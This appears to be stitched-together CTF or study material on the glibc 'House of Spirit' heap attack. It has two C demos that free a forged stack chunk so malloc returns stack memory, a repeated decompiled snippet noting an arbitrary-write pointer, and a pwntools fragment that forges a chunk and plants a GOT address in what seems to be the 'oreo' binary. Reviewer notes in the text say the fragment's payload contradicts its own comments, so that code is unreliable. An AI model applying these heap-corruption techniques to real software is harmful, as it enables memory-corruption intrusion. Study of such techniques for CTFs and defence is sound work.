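/*
 * House of Spirit demonstration (glibc fastbin free path).
 *
 * free() is handed a pointer that never came from malloc(): it points into a
 * stack array whose neighbouring words were written to look like a fastbin
 * chunk header.  free() only sanity-checks the chunk's own size field and the
 * size field of the chunk that would follow it, so the fake chunk is accepted
 * and linked into a fastbin; the next malloc() of the matching size class then
 * hands back a pointer into the stack array.  In a real target the
 * "overwritten pointer" is whatever write primitive the attacker already has.
 *
 * NOTE(review): the checks described in the messages below are those of the
 * fastbin path.  glibc builds with tcache (2.26+) route a 0x40-byte chunk to
 * tcache first, whose checks differ — confirm against the target glibc.
 * The program deliberately invokes undefined behaviour (freeing a non-heap
 * pointer) and is not expected to survive sanitizers or hardened allocators.
 */
int main(void)
{
    fprintf(stderr, "This file demonstrates the house of spirit attack.\n");

    fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    /* Warm-up allocation so the arena is initialised; result intentionally discarded. */
    (void)malloc(1);

    fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
    unsigned long long *a;
    /* This has nothing to do with fastbinsY (do not be fooled by the 10) -
     * fake_chunks is just a piece of memory to fulfil allocations (pointed to
     * from fastbinsY).  Index 1 holds the fake size field, index 2 is the
     * "user data" pointer handed to free(), index 9 the fake next chunk's size. */
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    /* %zu: sizeof yields size_t (the original used %lu, which only matches on LP64). */
    fprintf(stderr, "This region (memory of length: %zu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[7]);

    fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    /* Fake size field.  0x40 is the size class malloc(0x30) below rounds to,
     * and the low three flag bits are clear (IS_MMAPPED / NON_MAIN_ARENA set
     * would send free() down a different path). */
    fake_chunks[1] = 0x40; // this is the size

    fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
    /* fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8: the size
     * field of the next chunk sits 0x40 bytes after the fake size field at
     * index 1.  Any value in (16, system_mem) passes the nextsize check. */
    fake_chunks[9] = 0x1234; // nextsize

    fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
    /* The "user pointer" is 16 bytes past the chunk start; fake_chunks is
     * 16-byte aligned, so &fake_chunks[2] satisfies free()'s alignment check. */
    a = &fake_chunks[2];

    fprintf(stderr, "Freeing the overwritten pointer.\n");
    /* Undefined behaviour by design: a never came from malloc(). */
    free(a);

    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));
    return 0;
}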
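#include <stdio.h>
#include <stdlib.h>

/*
 * Older variant of the House of Spirit demo (stdout messages, nextsize 0x2240).
 *
 * A stack array is dressed up as a fastbin chunk (size at index 1, next
 * chunk's size at index 9) and a pointer into it is passed to free().  Because
 * free() validates only those two size fields for fastbin-sized chunks, the
 * fake chunk is linked into a fastbin and the following malloc(0x30) returns
 * stack memory.
 *
 * NOTE(review): describes the fastbin path; on glibc with tcache (2.26+) a
 * 0x40 chunk is taken by tcache first with different checks — confirm for the
 * target libc.  Freeing a non-heap pointer is undefined behaviour by design.
 * The extracted listing had lost the backslashes of its "\n" escapes; they are
 * restored here.
 */
int main(void)
{
    printf("This file demonstrates the house of spirit attack.\n");

    printf("Calling malloc() once so that it sets up its memory.\n");
    /* Arena warm-up; the allocation is intentionally never used. */
    (void)malloc(1);

    printf("We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
    unsigned long long *a;
    /* Backing memory for the fake chunk; 16-byte alignment is required so the
     * user pointer (&fake_chunks[2]) passes free()'s alignment check. */
    unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

    printf("This region must contain two chunks. The first starts at %p and the second at %p.\n", &fake_chunks[1], &fake_chunks[7]);

    printf("This chunk.size of this region has to be 16 more than the region (to accomodate the chunk data) while still falling into the fastbin category (<= 128). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
    printf("... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
    /* Fake size: the class malloc(0x30) rounds to, flag bits clear. */
    fake_chunks[1] = 0x40; // this is the size

    printf("The chunk.size of the *next* fake region has be above 2*SIZE_SZ (16 on x64) but below av->system_mem (128kb by default for the main arena) to pass the nextsize integrity checks .\n");
    /* Next chunk's size field: 0x40 bytes after index 1 -> index 9.  0x2240 is
     * simply a value inside (16, system_mem). */
    fake_chunks[9] = 0x2240; // nextsize

    printf("Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
    printf("... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
    a = &fake_chunks[2];

    printf("Freeing the overwritten pointer.\n");
    /* Undefined behaviour on purpose: a does not come from malloc(). */
    free(a);

    printf("Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
    printf("malloc(0x30): %p\n", malloc(0x30));
    return 0;
}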
v0 = __readgsdword(0x14u); printf("Enter any notice you'd like to submit with your order: "); fgets(message, 128, stdin); // message处有一个指针指向另一块区域,留言的数据在那。如果修改此指针可达到任意写效果。 vul(message); return __readgsdword(0x14u) ^ v0; }
v0 = __readgsdword(0x14u); printf("Enter any notice you'd like to submit with your order: "); fgets(message, 128, stdin); // message处有一个指针指向另一块区域,留言的数据在那。如果修改此指针可达到任意写效果。 vul(message); return __readgsdword(0x14u) ^ v0; }
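# Exploit fragment (pwntools, Python 2 str payloads) performing a House of
# Spirit against the target: a fastbin chunk's fd ("next link") is pointed at
# a fake chunk at 0x0804A2A8, the fake chunk's size / next-size words are laid
# out so free() accepts it, and a later allocation lands on the fake chunk.
# add(), message(), order(), p32 and oreo are defined elsewhere in the script.
# NOTE(review): the collapsed listing had swallowed message(), order() and two
# payload assignments into trailing comments; statement boundaries are
# restored below without changing any value.
payload = 'a' * 27 + p32(0x0804a2a8)  # set next link=0x0804A2A8, try to free a fake chunk
add(25 * 'a', payload)

# before free, we need to bypass some check
# fake chunk's size is 0x40
# 0x20 *'a' for padding the last fake chunk
# 0x40 for fake chunk's next chunk's prev_size
# 0x100 for fake chunk's next chunk's size
# set fake iofle' next to be NULL
# NOTE(review): the comments above describe a 0x20 pad + p32(0x40) + p32(0x100)
# layout, while the payload actually sent is 0x24 NUL bytes followed by 'a';
# the commented-out lines look like the earlier layout.  Confirm which layout
# the target's free() checks need before relying on this.
payload = 0x24 * '\x00' + 'a'  # + p32(0x60)
# payload = payload.ljust(52, 'b')
# payload += p32(0)
# payload = payload.ljust(128, 'c')
message(payload)

# fastbin 0x40: 0x0804A2A0->some where heap->NULL
# gdb.attach(p)
# p.interactive()
order()

# Presumably the allocation made by this add() is served from the fake chunk,
# so the first 4 bytes of the name now hold strlen's GOT address for a later
# read/write — verify against the binary's allocation sizes.
payload = p32(oreo.got['strlen']).ljust(20, 'a')
add(payload, 'b' * 20)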